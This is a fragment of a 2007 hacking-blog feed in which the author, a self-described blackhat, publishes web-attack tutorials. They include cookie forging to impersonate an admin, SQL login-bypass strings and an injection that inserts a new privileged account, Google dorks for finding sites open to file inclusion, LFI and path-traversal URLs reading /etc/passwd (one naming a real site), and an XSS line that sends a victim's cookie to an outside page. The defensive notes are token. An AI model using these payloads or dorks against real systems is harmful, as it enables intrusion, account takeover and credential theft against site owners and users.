The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-8727035194481331544?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/8727035194481331544/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=8727035194481331544' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8727035194481331544'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8727035194481331544'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/06/defacing-sites-methods.html' title='DEFACING SITES [Methods]'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_afH8IKGSEeI/RokFdlHP82I/AAAAAAAAACE/jPgo4cIxBzI/s72-c/haxshell.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-393060517924503735</id><published>2007-06-22T17:44:00.000+03:00</published><updated>2007-06-25T14:40:30.881+03:00</updated><title type='text'>AN ATTACK WITH CROSS SITE SCRIPTING</title><content type='html'>&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;CROSS SITE SCRIPTING A&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;TTACKS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Well, this is a simple example of an XSS vulnerable site. Its displays my cookie when i initiate document.cookie. If u know what i mean by cookies, then u will understand that,&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_afH8IKGSEeI/Rn1efiPu1yI/AAAAAAAAAB8/bo8a4sH02mQ/s1600-h/x4.png"&gt;&lt;img style="cursor: pointer; width: 284px; height: 240px;" src="http://bp3.blogger.com/_afH8IKGSEeI/Rn1efiPu1yI/AAAAAAAAAB8/bo8a4sH02mQ/s400/x4.png" alt="" id="BLOGGER_PHOTO_ID_5079319850605532962" border="0" /&gt;&lt;/a&gt; u can edit cookies too. Lets explain more on this below. &lt;span style="font-weight: bold;"&gt;Note&lt;/span&gt;, no beef with the site owners, just an example.&lt;br /&gt;&lt;span class="on down" style="display: block;" id="formatbar_Bold" title="Bold" onmouseover="ButtonHoverOn(this);" onmouseout="ButtonHoverOff(this);" onmouseup="" onmousedown="CheckFormatting(event);FormatbarButton('richeditorframe', this, 3);ButtonMouseDown(this);"&gt;&lt;/span&gt;&lt;br /&gt;For some months i have been studing more on Cross Site Script (XSS) and i think i need to post this. &lt;query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;I posted a zero day XSS &lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;/query&gt;&lt;query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;scanner some time last week, if u didn't get a glimpse of it, i can always do that later.&lt;br /&gt;&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;/query&gt;&lt;br /&gt;&lt;query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ABOUT THE SCANNER&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-Well that scanner, should get y&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;ou going when looking for Targets u wonna work out this weekend. Using Google Queries&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;/query&gt;&lt;query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt; is always the best way to hack with, we always say google is the best teacher, and the best hack tool ever exposed&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt; to the public, that is more than 60% accurate.&lt;br /&gt;&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;/query&gt;&lt;br /&gt;&lt;query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;I'm not the author of code, its done by a good friend, i spend time with google, so i dont need a code to pick XSS vulnerable sites.&lt;br /&gt;&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;br /&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;Anyway for starters, its good to know how to use tools before u get all blackhat and start picking targets with google or mouse point&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;er&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;/query&gt;&lt;query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;s, hehehe.......... I'm Blackhat, i do alot underground stuff, read the manifesto, but they will never get near me, since i leave no trace.&lt;br /&gt;&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;/query&gt;&lt;br /&gt;&lt;query&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;&lt;span style="font-weight: bold;"&gt;THE SCANNING PHOTOS&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Lemmie upload some photos of what the scanners can do.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;/query&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_afH8IKGSEeI/Rn1cICPu1xI/AAAAAAAAAB0/3FCxljXxglM/s1600-h/x1.png"&gt;&lt;img style="cursor: pointer;" src="http://bp1.blogger.com/_afH8IKGSEeI/Rn1cICPu1xI/AAAAAAAAAB0/3FCxljXxglM/s400/x1.png" alt="" id="BLOGGER_PHOTO_ID_5079317247855351570" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_afH8IKGSEeI/Rn1boCPu1wI/AAAAAAAAABs/lrqhMCAhpNc/s1600-h/x2.png"&gt;&lt;img style="cursor: pointer;" src="http://bp1.blogger.com/_afH8IKGSEeI/Rn1boCPu1wI/AAAAAAAAABs/lrqhMCAhpNc/s400/x2.png" alt="" id="BLOGGER_PHOTO_ID_5079316698099537666" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;query&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_afH8IKGSEeI/RnvpciPu1tI/AAAAAAAAABI/NrsfbDCiwFU/s1600-h/x2.png"&gt;&lt;img style="cursor: pointer;" src="http://bp1.blogger.com/_afH8IKGSEeI/RnvpciPu1tI/AAAAAAAAABI/NrsfbDCiwFU/s400/x2.png" alt="" id="BLOGGER_PHOTO_ID_5078909681228764882" border="0" /&gt;&lt;/a&gt;&lt;/query&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_afH8IKGSEeI/Rn1a-SPu1vI/AAAAAAAAABk/M83PsnargKU/s1600-h/x3.png"&gt;&lt;img style="cursor: pointer;" src="http://bp2.blogger.com/_afH8IKGSEeI/Rn1a-SPu1vI/AAAAAAAAABk/M83PsnargKU/s400/x3.png" alt="" id="BLOGGER_PHOTO_ID_5079315980839999218" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;query&gt;&lt;br /&gt;&lt;/query&gt;&lt;span class="postbody"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;So we are going to discuss the following&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;a) &lt;/span&gt;&lt;/span&gt;Cookie Stealing&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;b) &lt;/span&gt;Javascript Injection&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;c) &lt;/span&gt;Xss in general and how to apply the attack&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 255, 0);" class="postbody"&gt;What Is a Cookie?&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt; A cookie is a sensitive piece of data. You see once you go to a site and sign up a cookie is set to  remember you. A cookie just holds data that the site can check that you have and see if youve been there before, if you have then it checks to see if the user and password are correct then logs you in. Picture your at a night club and you buy a ticket and they give you a band. So you can go in and out (so you dont have to rebuy a tickey) Cookies go much farther then that as you can see. Night Clubs remember you for one night. Cookies can remember you for ever.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 255, 51);" class="postbody"&gt;Alerting &amp; Spoofing&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt; So you know what a cookie is... now how to you see them? Actually cookie editing is one of the most simple method. You see as long as you have a browser you can view and edit cookies, just with basic JavaScript(JS) skills. Load up your browser and go to the site... login... nowtype javascript:alert(document.cookie) and you should see a user and password (which is yours) If you don't thats ok! Most sites now a days don't use cookies... but use sessions... Sorry sessions can't be edited (they can) but not like cookies, once you edit a cookie you can spoof &lt;/span&gt;&lt;span class="postbody"&gt; yourself (username and password) Now let's begin to spoof... Ok say you alerted the cookie and saw something like this...&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt; strusername=Chuks;strpassword=danger&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt; Now say you know 'kenya' is a admin and you don't know his password... due to weak security you don't need a password javascript:void(document.cookie="strusername=kenya") Now type javascript:alert(document.cookie) !!! Heh welcome kenya That's pretty much all to Cookie Editing. Do more research on that, i aint doing it for u.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 255, 51);" class="postbody"&gt;What Is XSS?&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt; XSS, or CSS, whatever you perfer to call it, XSS (CSS) stands for Cross Site Scripting. Basically that means you inject script  any kind, to make it do whatever you want... Depends what you inject  will depend on the outcome. With XSS you can also steal input.  Such as user names passwords and cookies. This will all be discussed  so will many examples and this article should help you get creative with XSS.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt;With XSS you can execute any type of script on the client and the server. XSS isn't just executing script, but also stealing input. You setup XSS to grab the input and post it on your site in a secret file! This isn't all that XSS can do. Xss can also steal cookies. Cookies hold valuable Information such as user / passwords etc...&lt;br /&gt;&lt;br /&gt;So there was this question, the file output that the stealer script picks and pastes at the evil server with the cookies, could there be a google dork, that can help search for these outputs? Good Question, right? Hehehehe..............&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="postbody"&gt;&lt;br /&gt;&lt;br /&gt;Cross site scripting seems to be the future of web attack and new techniques develop every day. Good read. Will edit more later, since this was written in a Hurry and i havent explained more on the attack too, so hold on, atleast i did an Introduction.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="postbody"&gt;/Chuks&lt;br /&gt;&lt;/span&gt;&lt;query&gt;&lt;num of="" hosts=""&gt;&lt;website&gt;&lt;port&gt;&lt;alert message=""&gt;&lt;file&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/file&gt;&lt;/alert&gt;&lt;/port&gt;&lt;/website&gt;&lt;/num&gt;&lt;/query&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-393060517924503735?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/393060517924503735/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=393060517924503735' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/393060517924503735'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/393060517924503735'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/06/attack-with-cross-site-scripting.html' title='AN ATTACK WITH CROSS SITE SCRIPTING'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_afH8IKGSEeI/Rn1efiPu1yI/AAAAAAAAAB8/bo8a4sH02mQ/s72-c/x4.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3887902852771403111</id><published>2007-06-12T16:31:00.000+03:00</published><updated>2007-06-12T19:39:49.245+03:00</updated><title type='text'>THE MOST USED METHODS TO PENETRATE A WEBSERVER.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_afH8IKGSEeI/Rm6klCPu1qI/AAAAAAAAAAw/Sv-85qWjJpU/s1600-h/bhcircle2.gif"&gt;&lt;img style="cursor: pointer; width: 268px; height: 255px;" src="http://bp2.blogger.com/_afH8IKGSEeI/Rm6klCPu1qI/AAAAAAAAAAw/Sv-85qWjJpU/s400/bhcircle2.gif" alt="" id="BLOGGER_PHOTO_ID_5075174786258097826" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="postbody"&gt; * This tutorial is destined to increase your knowledge in internet security, penetrating web-servers;&lt;br /&gt;* This document was prepared for informational purposes only;&lt;br /&gt;* This document can not be multiplied without the authors permission.&lt;br /&gt;&lt;br /&gt;Respects to my friend, flow-flow, for the German paper on the same.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt;&lt;span style="font-weight: bold;"&gt;Hackers Manifesto &lt;/span&gt;&lt;br /&gt;I am here to exploit, to learn how thinks work.I’ve always put questions and I have always seeked for more than two hours.My crime is one of coriousity, I exploit what you dream of I am over ambition and will. If you want to enter this world , break away ,forget all you have learned from the others ,the ignorants ,those without interest and learn to do exactly what you want with your knowledge.&lt;br /&gt;I’m in the underground for 5 years ,from my first contact with the computer since 10 years ago ,I was fascinated from the first moment of the infinite possibilities that it opens for a man.&lt;br /&gt;You don’t know me ,so don’t judge me ! ONLY GOD can judge me !&lt;br /&gt;If you feel something reading these lines, that means that I am talking to you, if not look away.&lt;br /&gt;We have to help each other, hacking can not be defind ,hacking is a state of mind.&lt;br /&gt;I thank all of you that helped and help me !&lt;br /&gt;  This is my manifesto !&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; The tutorial will be structured in two directions : vulnerabilities and fixing them.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A lot of people are making tutorials but they just talk , i am going to really explain a few methods as we go. I don’t consider myself a specialist but i know what i am talking about.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;SQL-INJECTION&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="postbody"&gt; Sql injection is the method that exploits the errors from the code applications and it allows the attacker to inject SQL commands in the login forms ,feedback forms with the purpose to obtain access to sensible information from the data base.SQL Injection has effect because the imput forms allow SQL expressions to penetrate directly in the data base.&lt;br /&gt;Building programes with SQL to manipulate the commands from the data base and so getting access.The most used is SQL login bypass,through which we inject in the login and password fields.&lt;br /&gt;&lt;br /&gt;Example ‘ OR 1=1—&lt;br /&gt;                 URL scheme: http://site.com/index.php?id=0 ‘ OR 1=1—&lt;br /&gt;Other comands : admin’—&lt;br /&gt;                      ‘ OR 0=0—&lt;br /&gt;                       “ OR=0—&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt;                              OR 0=0—&lt;br /&gt;                   ‘ HI OR 1=1—&lt;br /&gt;         " or 0=0 #&lt;br /&gt;&lt;br /&gt;or 0=0 #&lt;br /&gt;&lt;br /&gt;' or 'x'='x&lt;br /&gt;&lt;br /&gt;" or "x"="x&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt; We look for vulnerable sites with the following &lt;span style="font-weight: bold; font-style: italic;"&gt;google-dorks&lt;/span&gt; :&lt;br /&gt;”admin\login.asp”&lt;br /&gt;”login.asp&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt; How to defend yourself from such attacks.&lt;br /&gt;The system must be checked for any sort of vulnerability ,the codes need to be bug free and the applications and all that means infrastructure must be satinized.&lt;br /&gt;At each change of the components it must be done a web security audit.&lt;br /&gt;It has no sense for me to get in any more detailes. If you don’t have a complex infrastructure that you have to take care of it isn’t forth for you to get more involved that you already are.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt;&lt;span style="font-weight: bold;"&gt;SQL Injection table modification&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; Here’s what we are going to do.&lt;br /&gt;We are going to create an account with special rights.This method involves 3 steps : the generation of an error that must be understood ,it is important to see a certain table name ,after that we are going to inject commands to create an new privilegeate account.&lt;br /&gt;&lt;br /&gt;At the username : ‘ HAVING 1=1&lt;br /&gt;The error must contain a table name : user_member.id .&lt;br /&gt;Then the injecting of the commands : ‘UNION SELECT * FROM user_member WHERE USER_ID=’ADMIN’ GROUP BY USER_ID HAVING 1=1;--&lt;br /&gt;After the error is generated we try :&lt;br /&gt;‘INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE)VALUES(‘HACKER’,’HACKED’,’HCKED’,GETDATE());--&lt;br /&gt;&lt;br /&gt;Now if everything went well we shold be able to log in with :&lt;br /&gt;-user :  hacker&lt;br /&gt;-password : hacked&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;REMOTE FILE INCLUSION&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt; In this method what we actually what to do is upload a file ,a shell emulator on the web page, the vulnerable web page.When the web site calls another page to be displayed we will build a URL scheme, we will upload the emulator,getting access to the entire server.&lt;br /&gt;This method is much more than this ,this is only a form of it so read further more and more tutorials.&lt;br /&gt;Here is a couple of &lt;span style="font-weight: bold; font-style: italic;"&gt;google-dorks&lt;/span&gt; to find vulnerable web sites  :&lt;br /&gt;: inurl :”index.php?page=”&lt;br /&gt;includes/header.php?systempath=&lt;br /&gt;/Gallery/displayCategory.php?basepath=&lt;br /&gt;/index.inc.php?PATH_Includes=&lt;br /&gt;/nphp/nphpd.php?nphp_config[LangFile]=&lt;br /&gt;/include/db.php?GLOBALS[rootdp]=&lt;br /&gt;/ashnews.php?pathtoashnews=&lt;br /&gt;/ashheadlines.php?pathtoashnews=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/demo/includes/init.php?user_inc=&lt;br /&gt;/jaf/index.php?show=&lt;br /&gt;/inc/shows.inc.php?cutepath=&lt;br /&gt;/poll/admin/common.inc.php?base_path=&lt;br /&gt;/pollvote/pollvote.php?pollname=&lt;br /&gt;/sources/post.php?fil_config=&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;/bb_lib/checkdb.inc.php?libpach=&lt;br /&gt;/include/livre_include.php?no_connect=lol&amp;chem_absolu=&lt;br /&gt;/index.php?from_market=Y&amp;amp;pageurl=&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;/derniers_commentaires.php?rep=&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&lt;br /&gt;/coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=&lt;br /&gt;/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;We test on : http://site.com/director_vulnerabil.php?=http://google.com ,if the page opens in google in the site frame then it is vulnerable.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;LOCAL FILE INCLUSION&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="postbody"&gt; A code problem can have serious consequencies ,this method is similarily to &lt;span style="font-weight: bold; font-style: italic;"&gt;CGI Exploitation&lt;/span&gt;. Lets say i have access the password folder from the UNIX server. Simple ,anyone can do this kind of stuff ,after a scan of a site and POC ! then great hacker.This is lame stuff ! never use a scanner ,only if you have to ,or you are interested in a particular thing at the site.&lt;br /&gt;At every vulnerability you have to understand the problem ,the code that generates it and so on.&lt;br /&gt;Here is an example of an error :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$page input is not satinized.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The content is crypted ,but you can try with the bruteforce method using a program such as Brutus, will publish a perl code soon.I searched for passwords of FTP accounts for instance.It depends on your luck to.&lt;br /&gt;&lt;br /&gt;URL scheme used : http://kleenrite.net/index.php?Tab=Renting&amp;incFile=/etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;REMOTE ADMIN FILE DISCLOSURE&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="postbody"&gt; You try this more ‘blind’ in general because we don’t know for sure if it will work every time.&lt;br /&gt;Remote Admin Password Disclosure,we try to acces folders from the inside.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;URL scheme : http://www.site.com/files/uploaded/download.php?filename=download.php&lt;br /&gt;I have posted alot of examples on other sites where I have found some serious info like passwords and so on. Here it isn’t such a big deal.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CROSS SITE SCRIPTING&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="postbody"&gt; It is in a state of research and it is the future some say ,well I am going to present how you can find this vulnerability and how you can exploited but as I said at RFI you have to study seriously if you want to really understand.&lt;br /&gt;More exactly I’m going to refer to cookie stealing. For the test you proceed similarly as in SQL Injection.You look in forms and you try to inject simple scripts like : &lt;script&gt;alert(‘XSS')&lt;/script&gt;.The result is a alert window with the text “xss”, good now you know that you can try a more complex script.We will build a cookie stealer and I will show you how you can look for cookies directly from an URL scheme.&lt;br /&gt;After we test it like so : script&gt;alert(‘XSS’) we do the following:&lt;br /&gt;window.location=’http://site.com/carie.php?cookie=’+’document.cookie;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="postbody"&gt;&lt;span style="font-weight: bold;"&gt;NULL BYTE-CGI EXPLOITATION&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="postbody"&gt; CGI (or Common Gateway Interface) is a file that it is found on web servers and it gives control at cgi and pl files.The CGI scripts and folders are used for statistics ,forms and data base commands.NULL byte is used in programming and it says the end of a string.The CGI page acceses other pages like so :&lt;br /&gt;            Index.cgi?pageid=2&lt;br /&gt;Here page2.html is shown but if we modify a little like so :&lt;br /&gt;Index.cgi?pageid.cgi%00&lt;br /&gt;We just added NULL byte and it comes to the end all the data in the URL. Now we do the following scheme :&lt;br /&gt;            Index.cgi?pageid=/etc/passwd%00&lt;br /&gt;&lt;br /&gt;Almost seems like LFI.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;DIRECTORY TRANSVERSAL&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="postbody"&gt; Directory Transversal is an HTTP exploit and it allows the attacker to access folders from the inside the server and to execute commands from the server’s root.&lt;br /&gt;&lt;br /&gt;· Access Control Lists (ACLs)&lt;br /&gt;· Root directory&lt;br /&gt;These are two security protocols used on a server. In Access Control Lists the administrator puts limits on users and configures all the other functions. Root directory stops users to access files that contain sensibile data like CMD on the Windows platform and passwd folder on Linux/UNIX.&lt;br /&gt;http://site.com/show.asp?view=../../../../../Windows/system.ini The URL scheme makes a request to the show.asp page from the server and sends the view parameter with the value&lt;br /&gt;=../../../../../Windows/system.ini .&lt;br /&gt;../ represents the director we go one folder up.&lt;br /&gt;Another scheme would be  : http:/site.com/scripts/..%5c../Windows/System32/ &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Hope this helps all of you, its an easy into to Web Application Security.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;See u soon,&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="postbody"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="postbody"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3887902852771403111?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3887902852771403111/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3887902852771403111' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3887902852771403111'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3887902852771403111'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/06/most-used-methods-to-penetrate.html' title='THE MOST USED METHODS TO PENETRATE A WEBSERVER.'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_afH8IKGSEeI/Rm6klCPu1qI/AAAAAAAAAAw/Sv-85qWjJpU/s72-c/bhcircle2.gif' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-2550331490654914443</id><published>2007-06-07T19:32:00.000+03:00</published><updated>2007-06-07T21:25:17.631+03:00</updated><title type='text'>PHOTOS FOR THE CEH, FIVE MODULE TRAINING</title><content type='html'>Well, i had promised i will upload the videos for the conference done a little while, but, i will have to postpone that to next week. 